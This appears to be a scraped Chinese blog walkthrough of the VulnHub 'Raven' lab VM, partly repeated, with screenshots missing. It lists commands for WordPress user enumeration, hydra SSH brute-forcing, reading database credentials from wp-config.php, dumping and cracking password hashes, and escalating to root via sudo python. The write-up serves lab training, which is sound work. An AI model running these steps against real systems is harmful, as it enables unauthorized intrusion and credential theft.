首页 > 其他分享> > vulnhub-raven

vulnhub-raven

2021-12-29 16:02:37 作者：互联网

vulnhub-raven

靶机下载：`https://download.vulnhub.com/raven/Raven.ova`

kali：nat模式，靶机也nat模式

探测主机

在这里插入图片描述

扫描端口

在这里插入图片描述

访问网站，查看源代码，看到service.html访问看到flag1

`dirb http://192.168.11.128`看到wordpress

在这里插入图片描述

`wpscan --url http://192.168.11.128/wordpress -e u`

在这里插入图片描述

`hydra -l michael -P rockyou.txt 192.168.11.128 ssh`

在这里插入图片描述

`ssh michael@192.168.11.128`

在这里插入图片描述

cd /var/www/html/wordpress/
ls

在这里插入图片描述

`cat wp-config.php`

在这里插入图片描述

`mysql -u root -p`

在这里插入图片描述

show databases;
use wordpress;
show tables;

在这里插入图片描述

`select * from wp_users;`MD5解码

在这里插入图片描述

exit
su steven

在这里插入图片描述

sudo python -c 'import pty;pty.spawn("/bin/bash")
whoami

在这里插入图片描述

cd …/…/
cat flag2.txt

在这里插入图片描述

标签：11.128,192.168,wordpress,vulnhub,wp,raven
来源： https://blog.csdn.net/weixin_50683638/article/details/122216842

vulnhub-raven

vulnhub-raven

靶机下载：https://download.vulnhub.com/raven/Raven.ova

kali：nat模式，靶机也nat模式

探测主机

扫描端口

访问网站，查看源代码，看到service.html访问看到flag1

dirb http://192.168.11.128看到wordpress

wpscan --url http://192.168.11.128/wordpress -e u

hydra -l michael -P rockyou.txt 192.168.11.128 ssh

ssh michael@192.168.11.128

cat wp-config.php

mysql -u root -p

select * from wp_users;MD5解码

靶机下载：`https://download.vulnhub.com/raven/Raven.ova`

`dirb http://192.168.11.128`看到wordpress

`wpscan --url http://192.168.11.128/wordpress -e u`

`hydra -l michael -P rockyou.txt 192.168.11.128 ssh`

`ssh michael@192.168.11.128`

`cat wp-config.php`

`mysql -u root -p`

`select * from wp_users;`MD5解码